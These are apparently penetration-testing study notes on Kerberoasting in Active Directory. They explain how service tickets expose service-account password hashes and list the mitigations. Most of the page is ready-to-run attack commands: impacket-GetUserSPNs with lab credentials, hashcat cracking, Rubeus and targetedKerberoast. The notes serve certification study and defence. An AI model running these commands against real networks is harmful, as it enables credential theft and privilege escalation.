// notes/ Active Directory
🏛️

Post Compromise Attacks Kerberoasting

This attack takes advantage of service accounts that use Kerberos authentication. 

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_kerberoasting

Kerberoasting

Overview

This attack takes advantage of service accounts that use Kerberos authentication.

First we request a TGT (Ticket Granting Ticket) from the KDC using the account we compromised. Next we request a TGS (Ticket Granting Service ticket) as well. The key flaw is that the TGS is encrypted with the Services account password hash.

Using the tool GetUserSPNs to request a TGS and obtain the Service accounts password hash.

GetUserSPNs

bash
$sudo impacket-GetUserSPNs PNPT.local/greg:Password1 -dc-ip 192.168.1.129 -request
bash
$hashcat -m 13100 crackme.txt ~/rockyou.txt -O

Rubeus

code
01.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Targeted Kerberoast

{% embed url="https://github.com/ShutdownRepo/targetedKerberoast" %}

code
01python targetedKerberoast.py -v -d offsec.lab -u hrapp -p 'Untimed$Runny'

Mitigation

  • Strong password policy
  • Principle of least privilege
  • Service accounts should NOT be Domain Administrators